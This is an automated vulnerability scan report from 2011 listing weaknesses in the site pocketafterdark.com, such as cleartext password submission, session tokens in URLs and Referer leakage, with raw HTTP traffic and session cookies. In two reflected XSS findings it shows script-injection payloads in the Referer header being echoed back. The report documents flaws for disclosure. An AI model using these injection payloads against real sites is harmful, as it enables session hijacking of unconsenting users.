XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, pocketafterdark.com

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Apr 28 13:48:48 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler
Loading

1. Cleartext submission of password

2. Session token in URL

3. Cross-site scripting (reflected)

3.1. http://pocketafterdark.com/user/loadLoginPopup.kickAction [Referer HTTP header]

3.2. http://pocketafterdark.com/user/loadLoginPopup.kickAction [Referer HTTP header]

4. Password field with autocomplete enabled

5. Cross-domain Referer leakage

5.1. http://pocketafterdark.com/service/displayHomePageExperience.kickAction

5.2. http://pocketafterdark.com/user/loadLoginPopup.kickAction

6. Cross-domain script include

6.1. http://pocketafterdark.com/service/displayHomePageExperience.kickAction

6.2. http://pocketafterdark.com/xd_receiver.htm

7. Cookie without HttpOnly flag set

7.1. http://pocketafterdark.com/service/displayHomePageExperience.kickAction

7.2. http://pocketafterdark.com/service/getKaMessages.kickAction

7.3. http://pocketafterdark.com/service/redirectByServerName.kickAction

7.4. http://pocketafterdark.com/user/loadLoginPopup.kickAction

8. Email addresses disclosed

9. Content type is not specified



1. Cleartext submission of password  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /user/loadLoginPopup.kickAction

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET /user/loadLoginPopup.kickAction?as=159176 HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; s_cc=true; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); base_domain_6e36d235a603a399bcb04dd8466b605c=pocketafterdark.com; fbsetting_6e36d235a603a399bcb04dd8466b605c=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; as=159176; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015244238; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: as=159176; Expires=Fri, 29-Apr-2011 18:32:36 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 28 Apr 2011 18:32:36 GMT
Content-Length: 4449

<!-- HTML POPUP CONTAINER -->
<form id="ka_loginPopup" method="post" action="/user/userLogin.kickAction?optOutUserId=" enctype="application/x-www-form-urlencoded">
       <input type="hidden" id="as" name="as" value="159176" />
...[SNIP]...
<div id="headerSignInPassInput">
<input id="password" maxlength="32" size="30" name="password" type="password" />
</div>
...[SNIP]...

2. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://pocketafterdark.com
Path:   /user/loadLoginPopup.kickAction

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /user/loadLoginPopup.kickAction?as=159176 HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; s_cc=true; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); base_domain_6e36d235a603a399bcb04dd8466b605c=pocketafterdark.com; fbsetting_6e36d235a603a399bcb04dd8466b605c=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; as=159176; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015244238; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: as=159176; Expires=Fri, 29-Apr-2011 18:32:36 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 28 Apr 2011 18:32:36 GMT
Content-Length: 4449

<!-- HTML POPUP CONTAINER -->
<form id="ka_loginPopup" method="post" action="/user/userLogin.kickAction?optOutUserId=" enctype="application/x-www-form-urlencoded">
       <input type="hidden" id="as" name=
...[SNIP]...
<div id="ka_rpxlogin">
                           Or you may <a id="ka_rpxnow" class="rpxnow" onclick="return false;" href="https://mylogin.rpxnow.com/openid/embed?token_url=http://pocketafterdark.com/user/userLoginRPX.kickAction%3Fas%3D159176%26redirectURL%3Dhttp://pocketafterdark.com/">log in using another provider</a>
...[SNIP]...
<div class="ka_thirdParty_icons">
                               <a title="Third Party Login" class="rpxnow" id="ka_rpxnow" href="https://mylogin.rpxnow.com/openid/embed?token_url=http://pocketafterdark.com/user/userLoginRPX.kickAction%3Fas%3D159176%26redirectURL%3Dhttp://pocketafterdark.com/">
                               </a>
...[SNIP]...
</div>
<iframe allowtransparency="true" class="rpxnow-embedded" frameborder="no" scrolling="no" src="https://mylogin.rpxnow.com/openid/embed?token_url=http://pocketafterdark.com/user/userLoginRPX.kickAction%3Fas%3D159176%26redirectURL%3Dhttp://pocketafterdark.com/" style="width:400px;height:250px;"></iframe>
...[SNIP]...

3. Cross-site scripting (reflected)  previous  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://pocketafterdark.com/user/loadLoginPopup.kickAction [Referer HTTP header]  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /user/loadLoginPopup.kickAction

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 295f4"><script>alert(1)</script>fde0291e34d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /user/loadLoginPopup.kickAction?as=159176 HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=295f4"><script>alert(1)</script>fde0291e34d
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; s_cc=true; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); base_domain_6e36d235a603a399bcb04dd8466b605c=pocketafterdark.com; fbsetting_6e36d235a603a399bcb04dd8466b605c=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; as=159176; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015244238; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: as=159176; Expires=Fri, 29-Apr-2011 18:32:39 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 28 Apr 2011 18:32:38 GMT
Content-Length: 4685

<!-- HTML POPUP CONTAINER -->
<form id="ka_loginPopup" method="post" action="/user/userLogin.kickAction?optOutUserId=" enctype="application/x-www-form-urlencoded">
       <input type="hidden" id="as" name=
...[SNIP]...
click="return false;" href="https://mylogin.rpxnow.com/openid/embed?token_url=http://pocketafterdark.com/user/userLoginRPX.kickAction%3Fas%3D159176%26redirectURL%3Dhttp://www.google.com/search?hl=en&q=295f4"><script>alert(1)</script>fde0291e34d">
...[SNIP]...

3.2. http://pocketafterdark.com/user/loadLoginPopup.kickAction [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /user/loadLoginPopup.kickAction

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e968f"><script>alert(1)</script>c89a08b708a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /user/loadLoginPopup.kickAction?as=159176 HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: e968f"><script>alert(1)</script>c89a08b708a
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; s_cc=true; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); base_domain_6e36d235a603a399bcb04dd8466b605c=pocketafterdark.com; fbsetting_6e36d235a603a399bcb04dd8466b605c=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; as=159176; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015244238; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: as=159176; Expires=Fri, 29-Apr-2011 18:32:39 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 28 Apr 2011 18:32:38 GMT
Content-Length: 4533

<!-- HTML POPUP CONTAINER -->
<form id="ka_loginPopup" method="post" action="/user/userLogin.kickAction?optOutUserId=" enctype="application/x-www-form-urlencoded">
       <input type="hidden" id="as" name=
...[SNIP]...
ue" class="rpxnow-embedded" frameborder="no" scrolling="no" src="https://mylogin.rpxnow.com/openid/embed?token_url=http://pocketafterdark.com/user/userLoginRPX.kickAction%3Fas%3D159176%26redirectURL%3De968f"><script>alert(1)</script>c89a08b708a" style="width:400px;height:250px;">
...[SNIP]...

4. Password field with autocomplete enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /user/loadLoginPopup.kickAction

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

GET /user/loadLoginPopup.kickAction?as=159176 HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; s_cc=true; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); base_domain_6e36d235a603a399bcb04dd8466b605c=pocketafterdark.com; fbsetting_6e36d235a603a399bcb04dd8466b605c=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; as=159176; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015244238; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: as=159176; Expires=Fri, 29-Apr-2011 18:32:36 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 28 Apr 2011 18:32:36 GMT
Content-Length: 4449

<!-- HTML POPUP CONTAINER -->
<form id="ka_loginPopup" method="post" action="/user/userLogin.kickAction?optOutUserId=" enctype="application/x-www-form-urlencoded">
       <input type="hidden" id="as" name="as" value="159176" />
...[SNIP]...
<div id="headerSignInPassInput">
<input id="password" maxlength="32" size="30" name="password" type="password" />
</div>
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://pocketafterdark.com/service/displayHomePageExperience.kickAction  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /service/displayHomePageExperience.kickAction

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /service/displayHomePageExperience.kickAction?page=Homepage&as=159176 HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015164529; s_sq=%5B%5BB%5D%5D; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); base_domain_6e36d235a603a399bcb04dd8466b605c=pocketafterdark.com; fbsetting_6e36d235a603a399bcb04dd8466b605c=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; as=159176

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: as=159176; Expires=Fri, 29-Apr-2011 18:32:21 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 28 Apr 2011 18:32:21 GMT
Content-Length: 58098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- NONAUTHENTICATED CONTAINER -->
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<link class="ka_style" rel="stylesheet" type="text/css" href="http://css.kickstatic.com/kickapps/cssc/5.5.2-916/ka_generalStyle.css" />


<!-- affiliate/homePage.jsp - UserHomepage -->
<link class="ka_style" rel="stylesheet" type="text/css" href="http://css.kickstatic.com/kickapps/cssc/5.5.2-916/ka_homepage.css" />
   <!-- no affiliate css -->
...[SNIP]...
<link rel="alternate" class="ka_style" type="application/rss+xml" title="Pocket After Dark Site Feed - RSS" href="http://pocketafterdark.com/service/getFeed.kickAction?as=159176" />
<link class="ka_style" rel="stylesheet" type="text/css" href="http://css.kickstatic.com/kickapps/cssc/5.5.2-916/ui-elements/ui-core.css" />
   <script type="text/javascript" src="http://js.kickstatic.com/kickapps/jsc/5.5.2-916/core/core.js"></script>
...[SNIP]...
</script>


   <script src="http://js.kickstatic.com/kickapps/jsc/5.5.2-916/swfobject2.2.js" type="text/javascript"></script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="https://rpxnow.com/openid/v2/widget"></script>
...[SNIP]...
</script>

<link href="http://hosting.kicknetwork.com/afterdark/css/ka_afterdark.css" type="text/css" rel="stylesheet">
<link href="http://dev.kickapps.com/pocketAfterDark/css/pad_fb.css" type="text/css" rel="stylesheet">
<script src="http://hosting.kicknetwork.com/afterdark/js/cufon-yui.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/Champagne__Limousines_200-Champagne__Limousines_500-Champagne__Limousines_italic_200-Champagne__Limousines_italic_500.font.js" type="text/javascript"></script>


<script src="http://hosting.kicknetwork.com/afterdark/js/ka_romance.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/jquery.rating.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/cookies.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/jquery.metadata.min.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/jquery.form.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/jquery.colorbox-min.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="http://hosting.kicknetwork.com/afterdark/js/jquery.rating.css" />
<link rel="stylesheet" type="text/css" href="http://hosting.kicknetwork.com/afterdark/js/jquery.colorbox.css" />


<link rel="stylesheet" type="text/css" href="http://hosting.kicknetwork.com/afterdark/smoothmenu/ddsmoothmenu.css" />
<link rel="stylesheet" type="text/css" href="http://hosting.kicknetwork.com/afterdark/smoothmenu/ddsmoothmenu-v.css" />
<script type="text/javascript" src="http://hosting.kicknetwork.com/afterdark/smoothmenu/ddsmoothmenu.js">

/***********************************************
* Smooth Navigational Menu- (c) Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dyna
...[SNIP]...
<!-- Begin Client Side Body Code -->
<script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/w/36151.js"></script>
<noscript>
<a href="http://polldaddy.com/w.php?p=36151/">Take Our Poll</a><span style="font-size:9px;"><a href="http://polldaddy.com/features-surveys/">online surveys</a>
...[SNIP]...
<br>
                        <a href="http://www.adobe.com/go/getflashplayer"><img src="http://media.kickstatic.com/kickapps/images/user/get_flash_playerplug.gif" alt="Get Adobe Flash player" border="0"/></a>
...[SNIP]...
<li id="ka_footerPowered">
   <a href="http://www.kickapps.com/overview" target="_kickapps" title="Social Media Platform by KickApps">Social Media Platform by KickApps</a>
...[SNIP]...
<li><a href="http://www.simonandschuster.com/">Simon & Schuster Home</a>
...[SNIP]...
<li><a href="http://romance.simonandschuster.com/">Romance Books</a>
...[SNIP]...
<li><a href="http://authors.simonandschuster.com/">Authors</a>
...[SNIP]...
<li><a href="http://books.simonandschuster.com/">Books</a>
...[SNIP]...
<li><a href="http://www.simonandschuster.com/multimedia">Multimedia</a>
...[SNIP]...
<li><a href="http://readinggroups.simonandschuster.com/">Reading Groups</a>
...[SNIP]...
<li><a href="http://www.simonandschuster.com/help">Help</a>
...[SNIP]...
<li><a href="http://store.simonandschuster.com/Shopping/ShoppingCart.aspx">View Cart</a>
...[SNIP]...
</div>

<script src="http://hosting.kicknetwork.com/afterdark/js/ka_afterdark.js" type="text/javascript"></script>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
<script type="text/javascript" src="http://affiliate.kickapps.com/js/facebookConnect.v2.js"></script>
<script type="text/javascript" src="http://hosting.kicknetwork.com/afterdark/js/ka_afterdark_facebook.js"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/font-replace.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/legal_pages.js" type="text/javascript"></script>

<script src="http://dev.kickapps.com/pocketAfterDark/js/script_fb.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://www.simonandschuster.com/javascripts/s_code.js">
</script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://sandsdev.122.2O7.net/b/ss/sandsdev/1/H.17--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

5.2. http://pocketafterdark.com/user/loadLoginPopup.kickAction  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /user/loadLoginPopup.kickAction

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /user/loadLoginPopup.kickAction?as=159176 HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; s_cc=true; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); base_domain_6e36d235a603a399bcb04dd8466b605c=pocketafterdark.com; fbsetting_6e36d235a603a399bcb04dd8466b605c=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; as=159176; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015244238; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: as=159176; Expires=Fri, 29-Apr-2011 18:32:36 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 28 Apr 2011 18:32:36 GMT
Content-Length: 4449

<!-- HTML POPUP CONTAINER -->
<form id="ka_loginPopup" method="post" action="/user/userLogin.kickAction?optOutUserId=" enctype="application/x-www-form-urlencoded">
       <input type="hidden" id="as" name=
...[SNIP]...
<div id="ka_rpxlogin">
                           Or you may <a id="ka_rpxnow" class="rpxnow" onclick="return false;" href="https://mylogin.rpxnow.com/openid/embed?token_url=http://pocketafterdark.com/user/userLoginRPX.kickAction%3Fas%3D159176%26redirectURL%3Dhttp://pocketafterdark.com/">log in using another provider</a>
...[SNIP]...
<div class="ka_thirdParty_icons">
                               <a title="Third Party Login" class="rpxnow" id="ka_rpxnow" href="https://mylogin.rpxnow.com/openid/embed?token_url=http://pocketafterdark.com/user/userLoginRPX.kickAction%3Fas%3D159176%26redirectURL%3Dhttp://pocketafterdark.com/">
                               </a>
...[SNIP]...
</div>
<iframe allowtransparency="true" class="rpxnow-embedded" frameborder="no" scrolling="no" src="https://mylogin.rpxnow.com/openid/embed?token_url=http://pocketafterdark.com/user/userLoginRPX.kickAction%3Fas%3D159176%26redirectURL%3Dhttp://pocketafterdark.com/" style="width:400px;height:250px;"></iframe>
...[SNIP]...

6. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

